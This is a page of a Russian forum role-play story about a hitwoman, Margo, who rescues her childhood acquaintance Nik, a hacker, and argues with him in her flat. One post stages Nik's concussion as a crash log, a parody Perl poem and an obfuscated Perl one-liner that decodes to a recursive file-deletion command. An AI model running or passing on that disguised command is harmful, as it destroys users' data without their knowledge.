Воскресенье, 01.03.2026, 10:29
Стальная тревога? Возвращение!
Главная | Регистрация | Вход Приветствую Вас Гость | RSS
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 4
  • 1
  • 2
  • 3
  • 4
  • »
Высотка
MargoДата: Вторник, 03.05.2011, 20:03 | Сообщение # 1
Киллёр
Награды: 7
Статус: Спит
<= Тамагава
Марго припарковала свой драгоценный "Сузуки", взвалила бесчувственного Ника на себя и поволокла ко входу в подъезд. Навстречу им попалась старушка, не японка, судя по лицу. Она неодобрительно покосилась на них и пробурчала с сильным акцентом:
- Опять всякая пьянь тут таскается...
Марго сделала вид, что не заметила старушки и продолжила свой путь. Поднявшись на девятый этаж, Марго огляделась, открыла обшарпанную дверь, затащила в квартиру Ника, положила его на пол и заперла все замки на двери.

НикДата: Вторник, 03.05.2011, 20:25 | Сообщение # 2
Хацкер

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except, it must be protected by a Probe. Typically the address is just plain bad or it is pointing at freed memory.

Arguments:
Arg1: fe8aa000, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: f0def3a9, If non-zero, the instruction address which referenced the bad memory address.
Arg4: 00000000, (reserved)
eax=00029fa8 ebx=fe8a7008 ecx=00000008 edx=fe880058
esi=00004141 edi=fe87d094
eip=f0def3a9 esp=f0011b78 ebp=f0011bac iopl=0
nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010206
KmxSbx+0x63a9:
f0def3a9 66893410 mov word ptr [eax+edx],si
ds:0023:fe8aa000=???

НикДата: Вторник, 03.05.2011, 20:31 | Сообщение # 3
Хацкер

echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Голова... Ох... Больно... Ооооууу! Пристрелите меня, кто-нибудь!

BEFOREHEAD: close door, each window & exit; wait until time.
open spellbook, study, read (scan, select, tell us);
write it, print the hex whole each watches,
reverse its length, write again;
kill spiders, pop them, chop, split, kill them.
unlink arms, shift, wait & listen (listening, wait),
sort the flock (then, warn the "goats" & kill the "sheep");
kill them, dump qualms, shift moralities,
values aside, each one;
die sheep! die to reverse the system
you accept (reject, respect);
next step,
kill next sacrifice, each sacrifice,
wait, redo ritual until "all the spirits are pleased";
do it ("as they say").
do it(*everyone***must***participate***in***forbidden**s*e*x*).
return last victim; package body;
exit crypt (time, times & "half a time") & close it,
select (quickly) & warn your next victim;
AFTERWORDS: tell nobody,
wait, wait until time;
wait until next year, next decade;
sleep, sleep, die yourself,
die at last

MargoДата: Среда, 04.05.2011, 16:39 | Сообщение # 4
Киллёр
Марго устало опустилась на пол. - И вот какого хрена я тебя сюда притащила? - с чувством произнесла она. Почему опустилась рука с оружием? Раньше ведь такого никогда не было! А это еще и Ник...
Никиту Находкина Марго мечтала убить с пяти лет. Именно тогда она впервые заметила этого "взрослого" мальчика, жившего в одном с ней дворе. Она частенько следила за ним: как он уходит в школу, что делает на прогулке, куда идет, с кем и как разговаривает. Тогда она заценила его "крутым перцем" и решила с ним дружить. Марго унеслась в воспоминания.

...Подтащив к окошку стул и привычно взгромоздившись на него, девочка выглянула на улицу. Было лето, и большие ребята гуляли на улице. Марго было тогда шесть лет - возраст шалостей, проказ и всевозможных проделок. На этот раз она собиралась опробовать классический "пакет с водой" на деле, и теперь ждала только подходящей жертвы. Вдруг сердце ее екнуло: по тротуару шла знакомая рыжая башка Ника, как его называли все друзья. И только поравнялась она с подоконником...
- ААААААА!!!!!
- Эй, Находкин! Я тебя знаю! Давай дружить! - крикнула ему Риточка в ответ.

Находкин тогда душевного порыва не оценил и убежал. И потом каждый раз, когда Марго пыталась познакомиться с ним (а способы были очень оригинальны), он отчего-то удирал и вопил что-то в духе "Изыди, маленькая сатана!". Марго потихоньку начинала его ненавидеть, и даже открыла охоту на Находкина (а ведь ей было еще восемь лет!). Но дети повзрослели, накал страстей утих, и утомительные погони по дворам и помойкам постепенно прекратились, но у Марго до сих пор оставалось к Нику какое-то сильное чувство, которое сама девушка характеризовала как "нелюбовисть".
К шестнадцати годам, Марго все-таки догадалась, что знаки внимания оказывают по-другому, и... подарила букет цветов Находкину, который уже заканчивал институт. Тот был смущен, но цветы принял. Они даже нормально, по-дружески (несмотря на все ухаживания Марго) общались около года. До определенного момента...

...- Находкин, ты - лох!
- И почему на этот раз?
- Ты учился в Екатеринбурге, а я буду учиться в Москве-е-е, бе-бе-бе!..

С тех пор она Находкина не видела. В душе осталась тихая ненависть к Находкину, к ее первой любви, так жестоко ее обломавшей. Естественно, заказ на убийство, которое было давней мечтой Марго, привел ее в состояние маньячного упоения. Но теперь оказывалось, что как бы она ни хотела, но убить его она не могла - старые, глубоко погребенные чувства вновь просыпались в ней, глуша всю ненависть, чувство долга и жажду наживы.
Голова... Ох... Больно... Ооооууу! Пристрелите меня, кто-нибудь! - внезапно простонал Находкин, скорчившись на полу. Марго встрепенулась. - Приходит в себя...
- Эх, если бы ты знал, как мне этого хочется...- пробормотала она, оттаскивая его в комнату и укладывая на диван: нельзя допускать, чтобы Никита, драгоценный, любимый Никита валялся на полу!

Сообщение отредактировал Margo - Среда, 04.05.2011, 16:41

НикДата: Среда, 04.05.2011, 19:42 | Сообщение # 5
Хацкер
Голова Ника разрывалась на части от боли.
Что со мной? И где я? Я что, вчера пил? Да быть такого не может... Но почему так трещит голова? Неужели все-таки пил? Но где и с кем? И самое главное - что? Судя по симптомам, жидкость для чистки стёкол..
От попыток что-либо вспомнить голова разболелась еще сильнее. Находкин, собрав всю свою силу воли, осторожно приоткрыл один глаз (головная боль при этом еще усилилась), потом второй. Сквозь кровавый туман, застилавший ему глаза, он увидел потолок... А потом... Потом лицо. Он не понял, откуда оно появилось, но было оно до странности знакомым. Эй, Находкин, я тебя знаю! - зазвенел вдруг внутри головы мерзкий пронзительный девчачий голосок.
Быть не может! Это бред! Сейчас проснусь... Сейчас... Как больно... И тошнит...
Ник попытался помотать головой, чтобы прогнать видение, но оно не исчезло, наоборот - стало более четким. Растрепанные тёмно-каштановые волосы, насмешливые карие глаза, нахальная улыбочка... Он слишком хорошо её помнил - эту приставучую маленькую девчонку... В детстве он натыкался на неё, куда бы ни пошёл. И вот она снова здесь...
Находкин рывком сел на диване и уставился на неё. Он только успел воскликнуть: Пурга?!, - как на него накатил жёсткий приступ рвоты. Он повалился ничком, свесил голову с дивана, и его долго и мучительно выворачивало.
Правда, после приступа рвоты Нику стало легче - боль уменьшилась, и видеть он стал более ясно. Он снова сел, уставился на Марго и сказал:
Ты что здесь делаешь?
Ничего более умного в его больную голову не пришло.

MargoДата: Среда, 04.05.2011, 19:51 | Сообщение # 6
Киллёр
Марго с ужасом наблюдала за сценой, за тем, как на дорогой, по всей видимости, линолеум льется отвратительная жидкость, которую ей сейчас придется вытирать. В ней закипала тихая злость.
- Находкин! Ты... ты... ты... скотина, вот ты кто! - заорала под конец Марго, вскакивая и открывая все окна. - Заставить бы тебя это все теперь убрать! - нравоучительно сказала она, уперев руки в бока и испепеляя Ника взглядом, но тут же смягчилась: - Воды тебе налить, болезный? И, может, таблетку какую дать?

НикДата: Среда, 04.05.2011, 20:01 | Сообщение # 7
Хацкер
Ник всё больше убеждался, что это не бред - Марго вела себя точно так, как и всегда.
- Воды налить. Это ты меня по башке стукнула? Ну и зачем я тебе понадобился? Детские игры продолжить решила? - спросил он, едва ворочая языком. Голова всё-таки продолжала кружиться.
Никита осторожно коснулся головы в том месте, где сильнее всего болело, и заскрипел зубами. Кажется, там здоровенная шишка. Он поморщился, потом вдруг по-детски обиженно заявил:
- Раньше ты меня так не била!

MargoДата: Среда, 04.05.2011, 20:18 | Сообщение # 8
Киллёр
Марго налила воды в стакан из кувшинчика, стоявшего недалеко на тумбочке и протянула Нику.
- На, мне для тебя даже воды не жалко... А била тебя не я, а четверо мужиков. И неизвестно, что они собирались с тобой сделать, если бы не я, - самодовольно заявила Марго, деликатно умалчивая о том, что сама должна была с ним сделать и отправляясь за тряпкой - надо было убирать разведенное Ником свинство. Откуда-то с кухни она кричала:
- И между прочим, я тебя спасла. Меня надо благодарить, а не блевать на пол и предъявлять мне беспочвенные обвинения!

НикДата: Среда, 04.05.2011, 20:35 | Сообщение # 9
Хацкер
Ник взял стакан с водой, который ему так любезно передала Марго, и приложил его к голове. Стакан был прохладный, и Нику стало легче.
Четверо мужиков... Какие четверо мужиков? Откуда они взялись? - напряженно задумался Ник. Он попытался вспомнить, что с ним было. Встреча с заказчиком, конечно! Улица, какие-то дети чокнутые, в войнушку играли, потом кафе... Узкоглазый официант... Мистер Находкин... И всё! Что было дальше - Ник вспомнить не смог.
- Четверо, говоришь? А почему я только одного помню? - спросил он у Марго, которая с тряпкой в руках зашла в комнату. - И куда они потом делись? И ты как здесь оказалась?
Ник почувствовал, что от избытка вопросов голова у него опять пошла кругом. Он выпил воду и прилег на диван. Марго отвечать не торопилась - Ник решил, что она сочла его вопросы риторическими.
- И кстати, что ты со мной делать собираешься? - спохватился вдруг он. Из детства он помнил, что от Марго просто так не отделаешься...

MargoДата: Среда, 04.05.2011, 20:47 | Сообщение # 10
Киллёр
Марго вернулась в комнату с тряпкой и ведром и начала активно вытирать пол, придумывая, что бы наврать Нику.
- Один зубы заговаривал, другой бил, еще двое страховали. Но больше они тебя не потревожат, ибо мертвы, - наконец заговорила Марго, разбираясь с лужами блевотины на полу. - А эта квартира - съемная. Моя. Поэтому не тебе спрашивать, как я здесь оказалась, - заявила она, указав тряпкой на лежавшего на диване Ника. - А что я собираюсь с тобой сделать, я сама пока еще не знаю, но про то, что я хотела сделать с тобой раньше, тебе лучше не знать, - заключила она.
- Чудесно! Я ведь даже и не наврала. И правда, что с ним теперь делать? Наверняка ведь за ним охотилась не только эта жалкая шайка... Охранять? Пока да, а там посмотрим, - решила для себя она.

НикДата: Четверг, 05.05.2011, 19:56 | Сообщение # 11
Хацкер
Ник лежал на диване и понемногу приходил в себя.
Четверо мужиков... Что им было нужно? Если бы хотели убить, то убили бы. А тут только оглушили. Значит, нужен был живым. Из этого можно сделать вывод, что убить меня хотели не они, а кто-то другой... А у этих четверых вполне могли быть сообщники. Не слишком ли много на мою бедную голову?
Марго гремела ведром и шуршала по полу тряпкой. Она-то откуда взялась? Я не видел ее столько лет... Наверное, выучилась на переводчика и работает здесь, -решил Ник. На него вдруг нахлынули детские воспоминания - маленькая приставучая Пурга когда-то буквально не давала ему прохода. Эти вечные погони по помойкам, обливание водой, стрельба из рогатки... Правда, потом это маленькое чудовище выросло, перебесилось и превратилось в симпатичную девушку... Может быть, между ними могло бы потом даже что-то быть (хотя вообще-то Ник обычно девушками не интересовался - ему было не до того), но Марго после школы уехала учиться в Москву. И вот - нежданная встреча в Японии.
Она, конечно, меня спасла, и спасибо ей за это. Но оставаться здесь мне нельзя - за мной могут прийти в любой момент. И будет совсем нехорошо, если она окажется рядом!
Нику стало страшно при мысли, что Марго может пострадать из-за него. Он решительно встал с дивана, хоть голова все еще болела и кружилась, и сказал:
- Ну ладно, спасибо за помощь. Рад был с тобой увидеться. Но мне пора идти!

MargoДата: Четверг, 05.05.2011, 20:54 | Сообщение # 12
Киллёр
- Ой, Находкин, ой дурак... Совсем не изменился, - подумала Марго, выслушивая его "спасибо" и "пора идти". - Вытащили его из поганых лап, отмыли, отчистили, а он тут...
- А ну сиде-е-ть! - рявкнула Марго. - Никуда ты не пойдешь, болван. Я тебя зря у них отбивала, что ли? Поймают ведь, и сделают все, что хотели сделать.
Она наконец затерла пол и устало опустилась на стул. Хотелось есть, несмотря даже на отвратительное недавнее представление и ужасный запах, еще не до конца выветрившийся из комнаты. В холодильнике, конечно же, было пусто - она ведь и не заезжала в квартиру до этого момента. Но, впрочем, Марго не жаловалась.

НикДата: Пятница, 06.05.2011, 20:08 | Сообщение # 13
Хацкер
- Ты... отбивала меня... у четверых мужиков? - Ник слегка покачнулся. Что-то у него в гудящей голове не сходилось - как эта хрупкая девушка могла справиться с четверыми? И она, кажется, сказала, что они мертвы...
- И что, по-твоему, они со мной сделать хотели? - спросил он у Марго. Та ничего не ответила, только смотрела на него взглядом, в котором ясно читалось ее отношение к его умственным способностям, и было оно весьма нелестным....
- И начерта я тебе понадобился - отбивать меня у четверых мужиков?
Не получив ответа и на этот вопрос, Ник вздохнул и снова опустился на диван.
- И потом - как они меня поймают, если они мертвы?
На этот вопрос ответа тоже не последовало.
Находкин задумчиво поерошил пятернёй свою и без того растрепанную рыжую шевелюру, задел здоровенную шишку, образовавшуюся на месте удара, скривился от боли, и наконец изрёк:
- У тебя есть что-нибудь от головы?
И торопливо добавил:
- Только топор не предлагать!

MargoДата: Суббота, 07.05.2011, 13:56 | Сообщение # 14
Киллёр
- Топора у меня, к сожалению, нет, а вот таблетки есть - вздохнула Марго, вынула лист таблеток из внутреннего кармана куртки и протянула Нику. - А ты, я смотрю, до сих пор сам с собой разговариваешь. Или тебе какие-нибудь голоса в голове отвечают? Но, впрочем, неважно. Лучше ответь на такой вопрос: кому ты вообще мог понадобиться? - спросила она, и тут же торопливо добавила: - Ты вообще по жизни чем занимаешься?
- Если я его не пристукну, наймут другого киллера, и меня тоже закажут. Пристукнуть жалко. Что делать, елки-палки, что же делать?!

НикДата: Суббота, 07.05.2011, 16:31 | Сообщение # 15
Хацкер
Ник взглянул на таблетки, хмыкнул. На листе таблеток по-русски было написано "Анальгин". Он оторвал сразу две, поморщился и проглотил. Сейчас ему нужна была ясная голова. Кабы не сболтнуть Марго чего-нибудь лишнего... И насчет голосов, отвечающих в голове - тоже.
- По жизни я занимаюсь компьютерами. Не удивительно, правда? - он иронически улыбнулся, взглянув на Марго. Уж она-то знала его с детства... - А понадобиться я мог много кому. Правда, тут загвоздка: у меня есть информация, что кое-кому я нужен мёртвым... А этим четверым я явно нужен был живым. Значит, это кто-то другой.
Ник потрогал шишку на макушке. Живым-то живым, но почему так грубо? Похищали его как-то раз, чтобы он выполнил одну работёнку, но там с ним нянькались как не знаю с кем. А тут - шмякнули по голове. Значит, заставлять его работать головой они явно не собирались... Он посмотрел на Марго. Как она изменилась с тех пор, как он её в последний раз видел! Стала она взрослая, и, пожалуй, красивая. Хотя в этом Ник мало разбирался. Жалко от неё уходить, не поговорив, но ничего не поделаешь - он должен.
- Знаешь, Марго, я рад тебя видеть, - сказал Ник, заглядывая девушке в глаза и чуть виновато улыбаясь, - Но я должен уйти. Я действительно нужен много кому, и если ты будешь рядом со мной, когда они до меня доберутся, то пострадаешь совершенно ни за что. Так что будь умницей - дай мне уйти. Я найду тебя, когда решу свои проблемы, я обещаю!
Ник замолчал, глядя на Марго проникновенным взглядом.

• Страница 1 из 4
  • 1
  • 2
  • 3
  • 4
  • »
Поиск:

Copyright MyCorp © 2026
Бесплатный конструктор сайтовuCoz